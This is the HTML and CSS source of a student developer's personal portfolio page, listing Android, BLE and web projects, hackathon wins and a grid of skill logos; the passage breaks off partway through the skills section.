<!DOCTYPE html>
<html>

<head>
  <title>Raj</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="icon" href="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/75ff554b9a524ee4450d831bbad52937.png?alt=media&token=57a77642-50c2-4850-986c-758491e00aa7" type="image/x-icon">
    <link rel="shortcut icon" href="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/75ff554b9a524ee4450d831bbad52937.png?alt=media&token=57a77642-50c2-4850-986c-758491e00aa7" type="image/x-icon">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="./index.css">

</head>
<style>
  .cursor {
    cursor: row-resize;
  }

  #btn {
    position: relative;
    background-color: rgba(210, 55, 55, 0.7);
    color: #fff;
    padding: 10px 20px;
    border: none;
    border-radius: 5px;
    font-size: 16px;
    cursor: pointer;
    backdrop-filter: blur(15px);
    transition: all 0.3s ease;
  }

  #btn::before {
    content: '';
    position: absolute;
    top: 0;
    left: 0;
    right: 0;
    bottom: 0;
    background-color: inherit;
    filter: blur(10px);
    z-index: -1;
  }

  #btn:hover {
    background-color: #0056b3;
    transform: scale(1.1);
  }

  #btn:hover::before {
    background-color: rgba(0, 86, 179, 0.7);
  }

  .image-container-wrapper {
    text-align: center;
  }

  #loading {
      font-size: 24px;
      color: #CC313D;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      background-color: #F7C5CC;
    }

    #content {
      display: none; /* Hidden initially */
    }
  

  /* ?????????????????????????????????????????????????????????????????? */
  #page-container {
  position: relative;
  transition: 1s all ease-in-out;
}
#page-container.menu-open {
  opacity: 0.6;
  filter: blur(20px);
  transform: scale(1.2);
}

/* section.section-content {
  display: flex;
  min-height: 100vh;
  padding: 50px;
  justify-content: center;
  align-items: center;
  background: #222;
  color: #fff;
  position: relative;
} */
section.section-content:after {
  /* content: "";
  position: absolute;
  left: 0;
  top: 0; */
  /* background: #000; */
  opacity: 0.5;
  height: 100%;
  width: 100%;
}

section.section-content h1 {
  font-size: 120px;
  margin: 0;
  z-index: 2;
  position: relative;
}

header.header-main {
  z-index: 99999;
  position: relative;
}
header.header-main #logo-image {
  position: fixed;
  top: 30px;
  left: 0;
  right: 0;
  width: 100px;
  height: auto;
  margin: 0 auto;
  opacity: 1;
  transition: 0.3s all cubic-bezier(0.075, 0.82, 0.165, 1) 0.6s;
}
header.header-main nav.nav-container {
  display: flex;
  height: 100px;
  justify-content: center;
  align-items: center;
  padding: 0 20px;
  position: fixed;
  left: 0;
  right: 0;
  width: 600px;
  margin: 0 auto;
  top: 20px;
  background-color: rgba(255, 255, 255, 0.05);
  border-radius: 200px;
  z-index: 9;
  -webkit-backdrop-filter: blur(5px);
          backdrop-filter: blur(5px);
  /* border: 1px solid rgba(255, 255, 255, 0.06); */
  transition: 1s all cubic-bezier(0.075, 0.82, 0.165, 1) 0.2s;
}
header.header-main nav.nav-container a.nav-link {
  color: #fff;
  text-decoration: none;
  font-weight: 700;
  display: block;
  padding: 10px 20px;
  line-height: 1;
  font-size: 15px;
  letter-spacing: 2px;
  /* text-transform: lowercase; */
  transition: 0.3s all cubic-bezier(0.075, 0.82, 0.165, 1) 0.6s;
}
header.header-main nav.nav-container button.menu-button {
  -webkit-appearance: none;
  background: rgba(0, 0, 0, 0.3);
  -webkit-backdrop-filter: blur(5px);
          backdrop-filter: blur(5px);
  border: 1px solid rgba(255, 255, 255, 0.1);
  position: absolute;
  z-index: 99;
  left: 0;
  margin: auto;
  right: 0;
  top: 0;
  bottom: 0;
  width: 60px;
  height: 60px;
  border-radius: 100%;
  outline: 0;
  border: 0;
  cursor: pointer;
  transition: 0.3s all cubic-bezier(0.075, 0.82, 0.165, 1) 0.2s;
  transform: scale(0);
}
header.header-main nav.nav-container button.menu-button span.menu-line {
  width: 40%;
  background: #fff;
  height: 2px;
  display: block;
  margin: 5px auto;
  transform: scalex(0);
  transition: 0.6s transform cubic-bezier(0.075, 0.82, 0.165, 1) 0s, 0.3s margin ease-in 0s;
}
header.header-main nav.nav-container button.menu-button:hover {
  /* border-color: rgba(255, 255, 255, 0.5); */
}
header.header-main nav.nav-container button.menu-button:hover span.menu-line {
  margin: 10px auto;
}

header.sticky-header #logo-image {
  top: 0;
  transform: scale(0.8);
  opacity: 0;
  transition-delay: 0.5s;
}
header.sticky-header nav.nav-container {
  top: 20px;
  padding: 0;
  width: 90px;
  height: 90px;
  transition-delay: 0.5s;
}
header.sticky-header nav.nav-container button.menu-button {
  transform: scale(1);
  transition-delay: 0.6s;
}
header.sticky-header nav.nav-container button.menu-button span.menu-line {
  transform: scalex(1);
  transition: 0.6s transform cubic-bezier(0.075, 0.82, 0.165, 1) 0.8s, 0.3s margin ease-in 0s;
}
header.sticky-header nav.nav-container a.nav-link {
  padding: 0;
  opacity: 0;
  letter-spacing: 0px;
  transform: scale(0.3);
  transition-delay: 0.2s;
}
@media only screen and (max-width: 768px) {   /* ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd */
    /* eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee */
    #page-container.menu-open {
    /* Adjust styles for when the menu is open on mobile */
    opacity: 0.6;
    filter: blur(20px);
    transform: scale(1.2);
  }


  section.section-content h1 {
    font-size: 60px; /* Adjust font size for mobile */
    margin: 0;
    z-index: 2;
    position: relative;
    text-align: center; /* Center text */
  }

  header.header-main {
    z-index: 99999;
    position: fixed;
    top: 0;
    left: 0;
    right: 0;
    background-color: rgba(255, 255, 255, 0.05);
    backdrop-filter: blur(5px);
  }

  header.header-main #logo-image {
    position: fixed;
    top: 10px;
    left: 10px;
    width: 80px; /* Adjust width for mobile */
    height: auto;
    margin: 0;
    opacity: 1;
    transition: 0.3s all cubic-bezier(0.075, 0.82, 0.165, 1) 0.6s;
  }

  header.header-main nav.nav-container {
    display: flex;
    flex-direction: column; /* Stack items vertically */
    height: auto;
    justify-content: center;
    align-items: center;
    padding: 10px;
    position: fixed;
    left: 0;
    right: 0;
    width: 100%;
    top: 1px; /* Adjust top position for mobile */
    background-color: rgba(255, 255, 255, 0.05);
    border-radius: 200px;
    z-index: 9;
    backdrop-filter: blur(500px);
    transition: 1s all cubic-bezier(0.075, 0.82, 0.165, 1) 0.2s;
  }

  header.header-main nav.nav-container a.nav-link {
    color: #fff;
    text-decoration: none;
    font-weight: 700;
    display: block;
    padding: 10px;
    font-size: 14px; /* Adjust font size for mobile */
    letter-spacing: 1px; /* Adjust letter spacing for mobile */
    text-align: center; /* Center text */
    transition: 0.3s all cubic-bezier(0.075, 0.82, 0.165, 1) 0.6s;
  }

  header.header-main nav.nav-container button.menu-button {
    background: rgba(0, 0, 0, 0.3);
    backdrop-filter: blur(5px);
    border: 1px solid rgba(255, 255, 255, 0.1);
    position: absolute;
    z-index: 99;
    left: 0;
    right: 0;
    margin: auto;
    top: 0;
    bottom: 0;
    width: 50px; /* Adjust width for mobile */
    height: 50px; /* Adjust height for mobile */
    border-radius: 50%;
    outline: 0;
    border: 0;
    cursor: pointer;
    transition: 0.3s all cubic-bezier(0.075, 0.82, 0.165, 1) 0.2s;
    transform: scale(0);
  }

  header.header-main nav.nav-container button.menu-button span.menu-line {
    width: 40%;
    background: #fff;
    height: 2px;
    display: block;
    margin: 5px auto;
    transform: scaleX(0);
    transition: 0.6s transform cubic-bezier(0.075, 0.82, 0.165, 1) 0s, 0.3s margin ease-in 0s;
  }

  header.sticky-header #logo-image {
    top: 0;
    transform: scale(0.8);
    opacity: 0;
    transition-delay: 0.5s;
  }

  header.sticky-header nav.nav-container {
    top: 10px; /* Adjust top position for sticky header on mobile */
    width: 90px;
    height: 90px;
    padding: 0;
    transition-delay: 0.5s;
  }

  header.sticky-header nav.nav-container button.menu-button {
    transform: scale(1);
    transition-delay: 0.6s;
  }

  header.sticky-header nav.nav-container button.menu-button span.menu-line {
    transform: scaleX(1);
    transition: 0.6s transform cubic-bezier(0.075, 0.82, 0.165, 1) 0.8s, 0.3s margin ease-in 0s;
  }

  header.sticky-header nav.nav-container a.nav-link {
    padding: 0;
    opacity: 0;
    letter-spacing: 0px;
    transform: scale(0.3);
    transition-delay: 0.2s;
  }
}
        /* eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee */
    /* ?????????????????????????????????????????????????????????????????? */

</style>


<body>
 
  <script>

     document.addEventListener("DOMContentLoaded", function() {
      const loadingElement = document.getElementById("loading");
      const contentElement = document.getElementById("content");

      // Set a timeout of 5 seconds
      setTimeout(function() {
        // Hide the loading div and show the content div
        loadingElement.style.display = "none";
        contentElement.style.display = "block";
      }, 500); 
    });
  </script>
  
  <div id="loading">Loading...</div>
  <!-- <header id="header">
    <div class="container">
      <a href="#home" class="cursor">About<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></a>
      <a href="#proHead" class="cursor">Projects<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></a>
      <a href="#achivements" class="cursor">Achivements<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></a>
      <a href="#skills" class="cursor">Skills<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></a>
      <a href="#contact" class="cursor">Contact<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></a>
    </div> -->
    <header id="header-main" class="header-main">
      <nav class="nav-container">
        <a href="#home" class="nav-link">About<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></a>
      <a href="#proHead" class="nav-link">Projects<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></a>
      <a href="#achivements" class="nav-link">Achivements<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></a>
      <a href="#skills" class="nav-link">Skills<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></a>
      <a href="#contact" class="nav-link">Contact<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></a>
        <button id="menu-open-button" class="menu-button">
          <span class="menu-line"></span>
          <span class="menu-line"></span>
        </button>
      </nav>
    <!-- <section class="slider">          
          <div class="slides">
            <div class="item active" id="slide1">
              <img src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/memount.jpg?alt=media&token=c7bac570-567a-49d6-b694-3ad46cfb6465" alt="slide1" />
                    <div class="text-overlay">
                      <p>SELECT <span style="color: red;">*</span> FROM <span style="color: red;">World</span> WHERE <span style="color: red;">"Someone"</span> LIKE <span style="color: red;">"%You%"</span></p>
                    </div>
                </div>
            <div class="item" id="slide2">
              <img src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/symposium1.png?alt=media&token=e22aaa8c-aa1b-42a3-9d29-a7963ab20de9" alt="slide2" />
            </div>
            <div class="item" id="slide3">
              <img src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/symposium2.jpg?alt=media&token=3d8b95af-8c82-4aa5-a25a-c40efa0da885"  alt="slide3" />
            </div>
            <div class="item" id="slide4">
              <img src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/d3fest2.jpg?alt=media&token=631ac898-55e5-4607-b956-c9afc23292d7" alt="slide4" />
            </div>
            <div class="item" id="slide5">
              <img src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/IMG-20230425-WA0033.jpg?alt=media&token=070928e4-83df-4efd-a2ce-7780d3ce3b65" alt="slide5" />
            </div>
            <div class="item" id="slide6">
              <img src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/innovateodisha.jpg?alt=media&token=6321fbe6-f1d9-49c7-9c74-2c6b6a721ed6" alt="slide6" />
            </div>
          </div>
          <div class="buttons" >
            <i onclick="slider('slide1')" class="" aria-hidden="true">o</i>
            <i onclick="slider('slide2')" class="" aria-hidden="true">o</i>
            <i onclick="slider('slide3')" class="" aria-hidden="true">o</i>
            <i onclick="slider('slide4')" class="" aria-hidden="true">o</i>
            <i onclick="slider('slide5')" class="" aria-hidden="true">o</i>
            <i onclick="slider('slide6')" class="" aria-hidden="true">o</i>
          </div>
        </section> -->

  </header>
  <div id="page-container" class="page-container">

  <section id="home">
    <div class="content-container">
      <div class="text-content">
        <h2>I am <br>
          <a href="https://git.io/typing-svg">
            <img
              src="https://readme-typing-svg.demolab.com?font=Pixelify+Sans&size=40&pause=1000&color=8742F5&background=1E27DC00&random=false&width=340&lines=Rajeev;Android+Developer+;Web+Developer+;Chess+Player+"
              alt="Typing SVG" loading="lazy">
          </a>
        </h2>

        <p>Hey there! Android Studio is using me!</p>
        <p>I excel in Android app development, Bluetooth Low Energy (BLE), image processing,
          and web development. I’m always interested in building cutting-edge Android applications,
          delving into IoT applications in BLE, and harnessing the power of image processing algorithms.
          My skills have been highlighted with remarkable achievements, including winning the Symposium 2023 at ITER
          and winning the GeeksforGeeks hackathon held at IIIT BBSR.</p>
        <!-- <a href="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/port%20pic%2FRajeev-kumar-Behera-91C2.pdf?alt=media&token=adad8d50-eb31-41dd-9a7b-fbb25891d4d2"
          download="Rajeev_Resume.pdf">
          <button id="btn">Download Resume</button>
        </a> -->
      </div>

      <div class="image-container-wrapper">
        <div class="image-container" id="rightSlideImage">
          <img
            src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/profile.png?alt=media&token=c0d8808f-3fbb-4010-80e8-2570579a48df"
            alt="Your Image" loading="lazy">
        </div>
        <div class="image-text">
          <p style="color: hsl(0, 0%, 100%); font-size: 25px; font-weight: bold; margin-bottom: 10px;">Rajeev Kumar
            Behera<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></p>
          <p style="color: #8742F5; font-size: 15px; margin: 0;">Upcoming Systems Engineer at TCS </p>
        </div>

      </div>

    </div>

  </section>
  <section id="proHead">
    <p class="sheading ">
      Projects<b class="semicolon">;</b>
      <span
        style="position: absolute; bottom: -10px; left: 0; width: 10%; height: 6px; background-color: #6c1fe8;"></span>
    </p>
  </section>
  <section id="projects" class="project section-content">
    <div class="project-container">
      <div class="project1">
        <a href="https://github.com/yesiamrajeev/sentenix-proto-1" target="_blank">
          <img src="./imgproject/sentinexpro.png" loading="lazy" class="proimg" alt="Project Image">
        </a>
        <div class="project-text1">
          <p>Sentinex</p>
        </div>
      </div>

      <div class="project2">
        <a href="https://github.com/yesiamrajeev/FaceDetection_Prototype3" target="_blank">
          <img src="./imgproject/facepro.png" width="15%" height="15%" loading="lazy" class="proimg" alt="Project Image">
        </a>
        <div class="project-text2">
          <p>Face Recognition</p>
        </div>
      </div>

      <!-- <div class="project3">
              <a href="https://github.com/example/project2" target="_blank">
                  <img src="./imgproject/Screenshot 2023-11-29 000733.png" width="15%" height="15%" class="proimg" alt="Project Image">
              </a>
              <div class="project-text3">
                  <p>Project3</p>
              </div>
          </div>
      
          <div class="project4">
              <a href="https://github.com/example/project3" target="_blank">
                  <img src="./imgproject/Screenshot 2023-11-29 000733.png" width="15%" height="15%" class="proimg" alt="Project Image">
              </a>
              <div class="project-text4">
                  <p>Project4</p>
              </div>
          </div> -->
    </div>
  </section>

  <section class="project">
    <div class="project-container">
      <div class="project3">
        <a href="https://github.com/hacktoberfest-codex/YATRA360" target="_blank">
          <img src="./imgproject/yatra360.png" width="15%" height="15%" class="proimg"loading="lazy" alt="Project Image">
        </a>
        <div class="project-text3">
          <p>Yatra 360</p>
        </div>
      </div>

      <div class="project4">
        <a href="https://github.com/yesiamrajeev/BLE-Scanner" target="_blank">
          <img src="./imgproject/scanner2.png" width="15%" height="15%" class="proimg" loading="lazy"alt="Project Image">
        </a>
        <div class="project-text4">
          <p>BLE Scanner</p>
        </div>
      </div>
    </div>
  </section>

  <section id="achivements" class="hero">
    <p class="Aheading">
      Achivements<b class="semicolon">;</b><span style="position: absolute; bottom: -10px; left: 0; width: 15%; height: 6px; background-color: #6c1fe8;"></span>
    </p>
    <div class="achivements-container">

      <h2 class="hide-on-large" style="color: #ffffff; margin-bottom: -2%;font-size: 20px;">Symposium 2023 Winner<b style="color: rgb(245, 122, 77); font-size: 20px;">;</b></h2>
      
      <div class="a1">
        <div class="achievement-card">
          <img
            src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/port%20pic%2Fsymposium1ratio.png?alt=media&token=fce4c033-e265-465e-9ae6-2fc55e11cfdd"
            style="object-fit: cover;" alt="Project Image"loading="lazy">
          <div class="text">
            <h2>Symposium 2023 Winner<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></h2>
            <p>We are thankful that our amazing project Yatra 360 won Symposium 2023 at ITER! Our innovative
              implementation of CBIR and QBE
              for indoor navigation systems, complete with advanced 3D image mapping, has captured the attention of
              scholars and received top
              honors in a stiff competition. <br> <br> The 6-hour event demonstrated our commitment, culminating in an
              impressive performance that
              earned us appreciation from the esteemed faculty, Additional Dean of ITER We are delighted to be
              recognized for our hard work
              and honored to have stood tall in the top 3 teams in our division!</p>
          </div>
        </div>
      </div>

      <h2 class="hide-on-large" style="color: #ffffff; margin-bottom: -2%;font-size: 20px;">D<sup>3</sup> Fest Hackathon Winner 2023<b style="color: rgb(245, 122, 77); font-size: 20px;">;</b></h2>
      <div class="a2">
        <div class="achievement-card">
          <div class="text">
            <h2>D<sup>3</sup> Fest Hackathon Winner 2023<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></h2>
            <p>"Patrologix" my team, won The Geek O Thon, a 24-hour intense hackathon by GeeksforGeeks and IIIT
              Bhubanswar at D3fest 2023!
              During our trip, a winning prototype was produced within 24 hours to earn a spot in the final round. The
              grand finale allowed us to
              refine our project presentation skills, and present our new ideas to esteemed judges. <br> <br>
              Sincere thanks to our teammates Sohan Mohanty, Dharmesh Raj and Yajy Goswami for playing an important role
              in our victory. Our project that empowers communities for
              security and connectivity.</p>
          </div>
          <img
            src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/D3fest.jpeg?alt=media&token=7271560b-0049-4a11-b737-2b22ee084fd9"
            style="object-fit: cover;" alt="Project Image"loading="lazy">
        </div>
      </div>

      <h2 class="hide-on-large" style="color: #ffffff; margin-bottom: -2%;font-size: 20px;">iFlashers<b style="color: rgb(245, 122, 77); font-size: 20px;">;</b></h2>
      <div class="a3">
        <div class="achievement-card">
          <img
            src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/port%20pic%2FDSC_1434ratio.png?alt=media&token=98cce108-15ba-465e-a572-3b06bbbb48ea"            style="object-fit: cover;" alt="Project Image"loading="lazy">
          <div class="text">
            <h2>iFlashers<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></h2>
            <p>In this dynamic visualization, iFlashers unveils its sophisticated indoor navigation service, bypassing
              the limitations
              of traditional GPS and the internet, using Bluetooth beacons for real-time location tracking When needed
              yi Executive Chairman of Startup
              Odisha Omkar Rai interacts with iFlashers. As India's former DG of Software Technology Parks and a
              technologist, Omkar Rai expresses
              appreciation, urging the team to "keep working". <br> <br>Image Software Products features the passion and
              credentials of Omkar Rai, a leading
              national advocate for iFlashers. This is a major milestone, where a prominent industry leader has embraced
              their vision.</p>
          </div>
        </div>
      </div>

      <h2 class="hide-on-large" style="color: #ffffff; margin-bottom: -2%;font-size: 20px;">InnovateOdisha Hackathon<b style="color: rgb(245, 122, 77); font-size: 20px;">;</b></h2>
      <div class="a4">
        <div class="achievement-card">
          <div class="text">
            <h2>InnovateOdisha Hackathon<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></h2>
            <p>Our team participated in the InnovateOdisha Hackathon, organized by NIT BBSR and Karkhana. It was an
              incredible experience where we spent 24 hours non-stop coding and developing our project. We worked on an
              indoor navigation app using BLE technology and received valuable feedback and suggestions for improvement.
              The event was a fantastic opportunity to innovate, collaborate, and showcase our skills.</p>
          </div>
          <img
            src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/innovateodisha%20(1).jpg?alt=media&token=f19d8274-ae91-41cc-91b7-2aa3c5d93219"
            style="object-fit: cover;" alt="Project Image"loading="lazy">

        </div>
      </div>

      <h2 class="hide-on-large" style="color: #ffffff; margin-bottom: -2%;font-size: 20px;">SOA Proxima 2024<b style="color: rgb(245, 122, 77); font-size: 20px;">;</b></h2>
      <div class="a3">
        <div class="achievement-card">
          <img
            src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/WhatsApp%20Image%202024-04-27%20at%2022.43.57_bb70b429.jpg?alt=media&token=d5bbec97-d744-48a2-be95-befacea4b977"
            style="object-fit: cover;" alt="Project Image"loading="lazy">
          <div class="text">
            <h2>SOA Proxima 2024<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></h2>
            <p>Team Patrologix is proud to introduce Sentinex, an innovative project that was born out of resilience and
              unity, with the goal of enhancing community safety. It all started with a triumphant win at the hackathon
              hosted by IIIT Bhubaneswar. Since then, Sentinex has continued to evolve, thanks to platforms like Vimarsh
              & Nirman, which have played a crucial role in refining its impact.
              <br>
              The support and guidance of Prof. Anukampa Behera, along with the recognition received at SOA Proxima,
              have further validated Sentinex's potential to revolutionize community security. It has garnered unanimous
              praise for its ability to make a real difference in society.
            <br>
              This journey has been characterized by unwavering perseverance and well-deserved recognition, which truly
              exemplify Patrologix's unwavering commitment to innovation and making a positive impact on society. It is Featured <a href="https://proxima-website.vercel.app/" target="_blank">here</a></p>
          </div>
        </div>
      </div>

      <!-- <div class="a1">
                                    <div class="a-text1">
                                        <p>We are thankful that our amazing project Yatra 360 won Symposium 2023 at ITER! Our innovative implementation of CBIR and QBE 
                                          for indoor navigation systems, complete with advanced 3D image mapping, has captured the attention of scholars and received top 
                                          honors in a stiff competition. <br> <br> The 6-hour event demonstrated our commitment, culminating in an impressive performance that 
                                          earned us appreciation from the esteemed faculty, Additional Dean of ITER We are delighted to be recognized for our hard work 
                                          and honored to have stood tall in the top 3 teams in our division!</p>
                                          
                                    </div>
                                      <img src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/symposium1.png?alt=media&token=e22aaa8c-aa1b-42a3-9d29-a7963ab20de9"  style="object-fit: cover;" class="proimg2" alt="Project Image">
                              </div>
              
                              <div class="a2">
                                      <img src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/d3.jpg?alt=media&token=d0531982-a19e-40ae-9528-fd4311846f92" width="15%" height="15%" class="proimg3" alt="Project Image">
                                  <div class="a-text2" style="padding-top: 1px;">
                                      <p>"Patrologix" my team, won The Geek O Thon, a 24-hour intense hackathon by GeeksforGeeks and IIIT Bhubanswar at D3fest 2023!
                                        During our trip, a winning prototype was produced within 24 hours to earn a spot in the final round. The grand finale allowed us to
                                        refine our project presentation skills, and present our new ideas to esteemed judges. <br> <br>
                                        Sincere thanks to our teammates Sohan Mohanty, Dharmesh Raj and Yajy Goswami for playing an important role in our victory. Our project that empowers communities for
                                          security and connectivity.</p>
                                  </div>
                              </div>
      
                              <div class="a3">
                                <div class="a-text3">
                                  <p>In this dynamic visualization, iFlashers unveils its sophisticated indoor navigation service, bypassing the limitations
                                    of traditional GPS and the internet, using Bluetooth beacons for real-time location tracking When needed yi Executive Chairman of Startup 
                                    Odisha Omkar Rai interacts with iFlashers. As India's former DG of Software Technology Parks and a technologist, Omkar Rai expresses 
                                    appreciation, urging the team to "keep working". <br> <br>Image Software Products features the passion and credentials of Omkar Rai, a leading 
                                    national advocate for iFlashers. This is a major milestone, where a prominent industry leader has embraced their vision.</p>
                              </div>
                                      <img src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/DSC_1434.png?alt=media&token=caf720e5-1577-4a9c-a633-b26d6a8d9369" width="15%" height="15%" class="proimg2" alt="Project Image">
                              </div>
      
                              <div class="a4">
                                      <img src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/innovateodisha%20(1).jpg?alt=media&token=f19d8274-ae91-41cc-91b7-2aa3c5d93219" width="15%" height="15%" class="proimg3" alt="Project Image">
                                  <div class="a-text4">

                                      <p>Description4</p>

                                  </div>
                              </div> -->
    </div>
  </section>

  <section id="proHead">
    <p class="sheading">
      Skills<b class="semicolon">;</b>
      <span
        style="position: absolute; bottom: -10px; left: 0; width: 5%; height: 6px; background-color: #6c1fe8;"></span>
    </p>
  </section>


  <section id="skills">    
    <div class="card animate-on-scroll">
      <img src="https://www.python.org/static/community_logos/python-logo-generic.svg" alt="Python Logo" class="logo">
      <h3>Python</h3>
    </div>

    <div class="card animate-on-scroll">
      <img
        src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/skills%2FAndroid_robot_(2014-2019).svg.png?alt=media&token=35d20daf-0310-45c8-8405-2a424b10c387"
        alt="Android Logo" class="logo">
      <h3>Android</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://firebase.google.com/images/brand-guidelines/logo-vertical.png" alt="Firebase Logo" class="logo">
      <h3>Firebase</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://about.gitlab.com/images/press/logo/png/gitlab-icon-rgb.png" alt="GitLab Logo" class="logo">
      <h3>GitLab</h3>
    </div>

    <div class="card animate-on-scroll">
      <img
        src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/skills%2FVisual_Studio_Icon_2022.svg.png?alt=media&token=54b70743-1c45-4cca-81b4-435ce8186dff"
        alt="Visual Studio Code Logo" class="logo">
      <h3>Visual Studio Code</h3>
    </div>

    <div class="card animate-on-scroll">
      <img
        src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/skills%2FEclipse-Luna-Logo.svg.png?alt=media&token=8eca16e1-56cf-4bc6-8f46-7a052051e6d4"
        alt="Eclipse Logo" class="logo">
      <h3>Eclipse</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://cloud.google.com/images/social-icon-google-cloud-1200-630.png" alt="GCP Logo" class="logo">
      <h3>GCP</h3>
    </div>

    <div class="card animate-on-scroll">
      <img
        src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/skills%2F800px-Figma-logo.svg.png?alt=media&token=a8e44a31-b677-4f96-8d71-7ab601e6c168"
        alt="Figma Logo" class="logo">
      <h3>Figma</h3>
    </div>

    <div class="card animate-on-scroll">
      <img
        src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/skills%2FAndroid_Studio_Logo_(2023).svg.png?alt=media&token=65b38acb-0e46-4d93-9c7c-04ff2a1b6460"
        alt="Android Studio Logo" class="logo">
      <h3>Android Studio</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://cdn.worldvectorlogo.com/logos/nodejs-icon.svg" alt="Node.js Logo" class="logo">
      <h3>Node.js</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://cdn.worldvectorlogo.com/logos/java-4.svg" alt="Java Logo" class="logo">
      <h3>Java</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://flask.palletsprojects.com/en/2.0.x/_images/flask-logo.png" alt="Flask Logo" class="logo">
      <h3>Flask</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://cdn.worldvectorlogo.com/logos/react-2.svg" alt="React Logo" class="logo">
      <h3>React</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://upload.wikimedia.org/wikipedia/commons/0/06/Kotlin_Icon.svg" alt="Kotlin Logo" class="logo">
      <h3>Kotlin</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://cdn.worldvectorlogo.com/logos/github-icon.svg" alt="GitHub Logo" class="logo">
      <h3>GitHub</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://cdn.worldvectorlogo.com/logos/c.svg" alt="C Logo" class="logo">
      <h3>C</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://cdn.worldvectorlogo.com/logos/c--4.svg" alt="C++ Logo" class="logo">
      <h3>C++</h3>
    </div>

    <div class="card animate-on-scroll">
      <img
        src="https://firebasestorage.googleapis.com/v0/b/portfolio-2a7b9.appspot.com/o/skills%2FMySQL_logo.svg.png?alt=media&token=8bbafd45-ce14-424b-8249-7e7c853ce4f5"
        alt="MySQL Logo" class="logo">
      <h3>MySQL</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://cdn.worldvectorlogo.com/logos/ubuntu-2.svg" alt="Ubuntu Logo" class="logo">
      <h3>Ubuntu</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://cdn.worldvectorlogo.com/logos/bootstrap-4.svg" alt="Bootstrap Logo" class="logo">
      <h3>Bootstrap</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://cdn.worldvectorlogo.com/logos/javascript-1.svg" alt="JavaScript Logo" class="logo">
      <h3>JavaScript</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://cdn.worldvectorlogo.com/logos/git-icon.svg" alt="Git Logo" class="logo">
      <h3>Git</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://cdn.worldvectorlogo.com/logos/html5-2.svg" alt="HTML Logo" class="logo">
      <h3>HTML</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://cdn.worldvectorlogo.com/logos/css-3.svg" alt="CSS Logo" class="logo">
      <h3>CSS</h3>
    </div>

    <div class="card animate-on-scroll">
      <img src="https://user-images.githubusercontent.com/116848225/232304153-a758ecdc-abe0-49eb-a75f-76f4038a321f.png" alt="CSS Logo" class="logo">
      <h3>Terraform</h3>
    </div>
    <div class="card animate-on-scroll">
